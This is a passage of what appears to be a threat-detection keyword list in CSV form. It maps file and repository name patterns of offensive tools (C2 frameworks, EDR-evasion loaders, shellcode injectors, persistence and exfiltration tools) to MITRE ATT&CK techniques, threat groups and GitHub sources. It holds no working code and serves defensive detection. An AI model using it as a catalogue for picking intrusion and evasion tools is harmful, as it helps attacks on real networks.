T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" +"*/RealTimeSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data 
exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A"
+"*/realvnc-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/Reaper.git*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*/Reaper/Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*/ReaperX64.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z"
+"*/REC2.git*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*/recon-archy.git*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z"
+"*/RecycledInjector*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z"
+"*/RecycledInjector.git*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z"
+"*/RedGuard.git*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard.go*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - 
APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard_32","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/RedGuard_64","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/redirector/redirector.py*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/redis-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/redis-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/redpeanut.cer*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*/RedPeanut.git*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*/RedPeanut.html*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*/RedPeanutAgent/*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*/RedPeanutRP/*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in 
.Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*/RedPersist.git*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*/redsocks.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*/redsocks-fw.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"*/RedTeam_toolkit*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" +"*/red-team-scripts*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*/RedWarden.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*/ReferenceSourceLibraries/Sharpire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - 
T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/ReflectiveDll.c*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/ReflectiveDLLInjection/*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/ReflectiveLoader.c*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera 
- APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/ReflectiveNtdll.git*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*/RefleXXion.git*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" +"*/reGeorg.git*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" +"*/RegistryPersistence.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/Registry-Recon/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 
- T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","314","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" +"*/reg-query.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/regreeper.jpg*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*/Reg-Restore-Persistence-Mole*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
